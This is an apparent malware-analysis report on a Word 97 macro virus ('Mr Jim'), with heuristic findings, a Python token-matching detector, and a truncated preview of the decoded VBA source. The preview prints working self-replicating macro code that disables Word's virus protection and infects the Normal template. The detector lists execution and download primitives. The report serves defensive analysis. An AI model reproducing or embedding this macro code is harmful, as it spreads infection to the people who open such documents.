Verdict: MALICIOUS
Risk Score: 288
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros with a Document_Open auto-execute entry point, and the macro code also contains a Shell() call, so the document can run arbitrary commands as soon as it is opened. ClamAV identifies it as Win.Trojan.Jim-1, the "Mr Jim" W97M macro virus family; the banner in the extracted source dates it to March 1999. The visible part of the macro is a classic self-replicating Word 97 macro virus rather than a downloader: it first checks for a kill-switch file (c:\_vac.txt) and aborts with a message box if it exists, then disables Word's macro virus protection, cancel key, alerts and prompts (Options.VirusProtection, Application.DisplayAlerts and similar set to Chr$(48), i.e. the string "0", which coerces to False), reads the Windows directory from the [Paths] section of c:\msdos.sys (a Windows 9x-era technique), and copies its own code module into the global Normal template through VBProject.VBComponents(...).CodeModule. The component index is written as Cos(Atn(CInt(1))), which is cos(pi/4) = 0.707 and rounds to 1 when VBA coerces it to an index, a light obfuscation of the first module (ThisDocument); the '45 comment lines between statements and the generation counter belong to its polymorphic regeneration loop. The preview is truncated before the Shell() and Environ() calls flagged by the heuristics, so whether they fetch or launch a second stage cannot be confirmed from the visible source; the source banner advertises stealth, polymorphism, mIRC and e-mail spreading.
Heuristics (6)

| Finding | Severity | Rule ID | Description |
|---|---|---|---|
| ClamAV: Win.Trojan.Jim-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Win.Trojan.Jim-1 |
| VBA macros detected | medium | OLE_VBA_MACROS | Document contains VBA macro code (4 related findings) |
| Shell() call in VBA | critical | OLE_VBA_SHELL | Shell() call in VBA |
| Document_Open macro | high | OLE_VBA_DOCOPEN | Document_Open auto-execute macro |
| VBA p-code auto-exec with execution tokens | high | OLE_VBA_PCODE_AUTOEXEC_EXEC | Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where the visible source is unavailable. |
| Environ() call (env variable access) | low | OLE_VBA_ENVIRON | Environ() call (env variable access) |
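The rule logic listed above is simple token matching, and it is worth seeing why comment stripping and a p-code fallback both matter: the banner in this sample's source is full of words, and a p-code-only document has no source to strip. The script below is an added example, not the analyzer's or oletools' code; it re-implements the report's rule IDs over decoded VBA and, for the compiled-stream case, over raw bytes. The two VBA snippets are constructed to resemble the preview (they are not the real macros.bas), the three VBA_* rule IDs and the is_malicious decision rule are this example's own assumptions, and the p-code scan assumes identifier names survive as plain bytes in the module stream.

```python
"""Token heuristics for triaging extracted VBA, modelled on the rule IDs in the
report (OLE_VBA_DOCOPEN, OLE_VBA_SHELL, OLE_VBA_ENVIRON, OLE_VBA_PCODE_AUTOEXEC_EXEC).
Added example: not the analyzer's or oletools' code. The VBA snippets below are
constructed to mimic the preview; they are not the real macros.bas."""
import re

# Entry points Office runs without user interaction.
AUTOEXEC = re.compile(
    r"\b(Document_Open|Document_Close|AutoOpen|AutoClose|AutoExec|Workbook_Open|Auto_Open)\b", re.I)
# Command execution, object creation and download primitives.
EXEC_TOKENS = re.compile(
    r"\b(Shell|ShellExecute|CreateObject|GetObject|URLDownloadToFile|XMLHTTP)\b", re.I)
ENVIRON = re.compile(r"\bEnviron\s*\(", re.I)
# Word settings a macro virus flips to stay quiet and survive (seen in the preview).
SECURITY_TAMPER = re.compile(
    r"\b(Options\.VirusProtection|Application\.DisplayAlerts|EnableCancelKey|SaveNormalPrompt)\b", re.I)
# Writing into another document's VBA project is how W97M viruses replicate.
SELF_REPLICATION = re.compile(r"VBProject\.VBComponents", re.I)
# Cos(Atn(CInt(1))) = cos(pi/4) ~ 0.707, which VBA rounds to 1 when used as an index.
OBFUSCATED_INDEX = re.compile(r"\bCos\s*\(\s*Atn\s*\(", re.I)


def strip_comments(source: str) -> str:
    """Drop ' and Rem comments (string-literal aware) so banner text cannot trigger rules."""
    kept = []
    for line in source.splitlines():
        code, in_str = [], False
        for ch in line:
            if ch == '"':
                in_str = not in_str
            elif ch == "'" and not in_str:
                break
            code.append(ch)
        stripped = "".join(code)
        if re.match(r"\s*rem\b", stripped, re.I) or not stripped.strip():
            continue
        kept.append(stripped)
    return "\n".join(kept)


def scan_source(source: str) -> dict[str, str]:
    """Return {rule_id: severity} for decoded VBA source. Severities follow the report;
    the three VBA_* IDs are this example's own additions (assumed, not analyzer IDs)."""
    code = strip_comments(source)
    rules = [
        ("OLE_VBA_DOCOPEN", "high", AUTOEXEC),
        ("OLE_VBA_SHELL", "critical", EXEC_TOKENS),
        ("OLE_VBA_ENVIRON", "low", ENVIRON),
        ("VBA_SECURITY_TAMPER", "high", SECURITY_TAMPER),
        ("VBA_SELF_REPLICATION", "high", SELF_REPLICATION),
        ("VBA_OBFUSCATED_INDEX", "medium", OBFUSCATED_INDEX),
    ]
    return {rid: sev for rid, sev, rx in rules if rx.search(code)}


def scan_pcode(stream: bytes) -> dict[str, str]:
    """Fallback when source extraction fails: assumes identifier names still appear as
    plain bytes in the compiled module stream. No comment stripping is possible here."""
    text = stream.decode("latin-1")
    if AUTOEXEC.search(text) and EXEC_TOKENS.search(text):
        return {"OLE_VBA_PCODE_AUTOEXEC_EXEC": "high"}
    return {}


def is_malicious(findings: dict[str, str]) -> bool:
    """Assumed decision rule: an auto-exec entry point combined with execution or
    self-replication capability is enough to flag the document."""
    autoexec = "OLE_VBA_DOCOPEN" in findings or "OLE_VBA_PCODE_AUTOEXEC_EXEC" in findings
    capability = set(findings) & {"OLE_VBA_SHELL", "VBA_SELF_REPLICATION", "OLE_VBA_PCODE_AUTOEXEC_EXEC"}
    return autoexec and bool(capability)


# Constructed to resemble the preview (not the real sample).
MRJIM_LIKE = r'''
Private Sub Document_Open()
'45
Options.VirusProtection = Chr$(48)
'45
Application.DisplayAlerts = Chr$(48)
Set a = ActiveDocument.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
windir = Environ("windir")
Shell windir & "\notepad.exe", vbHide  ' launch something
End Sub
'''

# Constructed benign macro: Shell only appears inside a comment.
BENIGN = r'''
Private Sub Document_Open()
    ' Refresh fields only; no Shell() call is made here
    ActiveDocument.Fields.Update
End Sub
'''

# Constructed stand-in for a compiled stream whose source could not be decoded.
PCODE_BLOB = b"\x00\x01ThisDocument\x00Document_Open\x00\x02Shell\x00"

if __name__ == "__main__":
    for name, src in (("mrjim-like", MRJIM_LIKE), ("benign", BENIGN)):
        f = scan_source(src)
        print(name, "MALICIOUS" if is_malicious(f) else "clean", sorted(f))
    print("pcode", scan_pcode(PCODE_BLOB))
```

The benign snippet is the reason for strip_comments: a Document_Open handler whose only "Shell" is in a comment must not earn OLE_VBA_SHELL, whereas the compiled-stream path has no comments to worry about and so pairs the auto-exec token directly with an execution token, exactly the situation OLE_VBA_PCODE_AUTOEXEC_EXEC is described as covering.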
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection | Obfuscation or payload |
|---|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 63374 bytes | 0770e715fea85a34ea52158327a2492b635eaf12c8fcd2275679e2678265d4c5 | ClamAV: Win.Trojan.Jim-1 | unlikely |

Preview script: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' : ÖÄÄùú : ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ· : úùÄÄÄ· :
' ÈÄ : ÈÄÄÄÄÄÄÄÄùú : [ Mr Jim/W97Macro Virus ] : úùÄÄÄÄÄÄļ : ļ
' ù ÓÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄĽ Started 99/03/XXù
' ù -~BY~- $$ ù
' ù $$$$$$$$ $$$$$$$$$ $$$$$$$$ $$$$$$$$ $$$$ $$$$$$$$$ ù
' ú $$$$$ $$$$ $$$$$ $$$$$ $$$$ $$$$$$$$$$ $$ $$$$$$ $$$$ ú
' $$$$$ $$$$$ $$$$$ $$$$ $$$$ $$$$ $$$$
' $$$$$$$$ $$$$$$$$$ $$$$$$$$$$ $$$$ $$$$ $$$$
' ú $$$$ $$$$$ $$$$$ $$$$ $$$$ $$$$ $$$$ ú
' $$$$$ $$$$ $$$$$ $$$$$ $$$$ $$$$ $$$$$$ $$$$
' $$$$$$$$ $$$$$$$$$ $$$$$ $$$$ $$$$ $$$$$$$$
' [Member of Technological Illusions]
' ù ** Stealth, Polymorphic, mIRC, Email, Espionaging virus ** ù
' ù [----------------Some words from our sponsor-------------------] ù
' ú [ Har du vad som krävs för att bli en international ] ú
'ÖÄùú : [ bussiness man? ] :úùÄ·
' [Swedish: "Do you have what it takes to become an international business man?"]
': ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ :
'ÖÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄùú úùÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ·
': Greetz : :
'ú Billy_Bel, Darkman, Techno_Phunc, Urgo32, Vecna, Veedee, Simon7 ú
'ú Flitnic, Lord_Arz, Virus-X, Owl, T-2000, Griyo, Opic, Serial Killer ú
'ù The Lich, LovinGod, Yesnah :
'ÈÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄùú úùÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄļ
'45
Private Sub Document_Open()
'45
'On Error GoTo Host_infiltrated
'45
'It's not my intention to create holocaust, this is just an
'45
'experiment of mine (AI rocks ;)). Follow the instructions for vaccine!
'45
'create c:\_vac.txt for immunity.
'45
Mr_Jim_by_Septic:
'45
generation = 2
'45
check_vac = "c:\_vac.txt"
'45
If Dir(check_vac) <> "" Then MsgBox "I guess you have what it takes.", vbInformation, "[Mr Jim] By SeptiC/TI": GoTo Host_infiltrated
'45
da_normal = Dir(NormalTemplate.FullName)
'45
If da_normal = "" Then GoTo No_normal
'45
SetAttr NormalTemplate.FullName, vbNormal
'45
No_normal:
'45
Application.EnableCancelKey = wdCancelDisabled
'45
Options.VirusProtection = Chr$(48)
'45
Options.SaveNormalPrompt = Chr$(48)
'45
Options.ConfirmConversions = Chr$(48)
'45
Application.ScreenUpdating = Chr$(48)
'45
Application.DisplayStatusBar = Chr$(48)
'45
Application.DisplayAlerts = Chr$(48)
'45
windir = System.PrivateProfileString("c:\msdos.sys", "Paths", "WinDir")
'45
Dim Act_doc As Object: Set Act_doc = ActiveDocument
'45
Dim Act_norm As Object: Set Act_norm = NormalTemplate
'45
If Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then act_inf = 1
'45
If Act_norm.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.CountOfLines > 360 Then normal_inf = 1
'45
infect_doc:
'45
If act_inf = 1 Then GoTo infect_normal
'45
Set a = Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'45
Set b = Act_norm.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule
'45
Act_doc.VBProject.VBComponents(Cos(Atn(CInt(1)))).CodeModule.DeleteLines 1, a.CountOfLines
'45
Set fix_lines_1 = b
'45
With fix_lines_1
'45
code_1 = .Lines(1, .CountOfLines)
'45
End With
'45
Act_doc.VBProject.VBComponents.Item(Cos(Atn(CInt(1)))).CodeModule.insertlines 1, code_1
'45
Set polyit = ActiveDocument.VBProject.VBComponents.Item(Cos(Atn(CInt(1))))
'45
temp_number = generation + 1
'45
With polyit.CodeModule
'45
For da_line = 1 To 520 Step
... (truncated)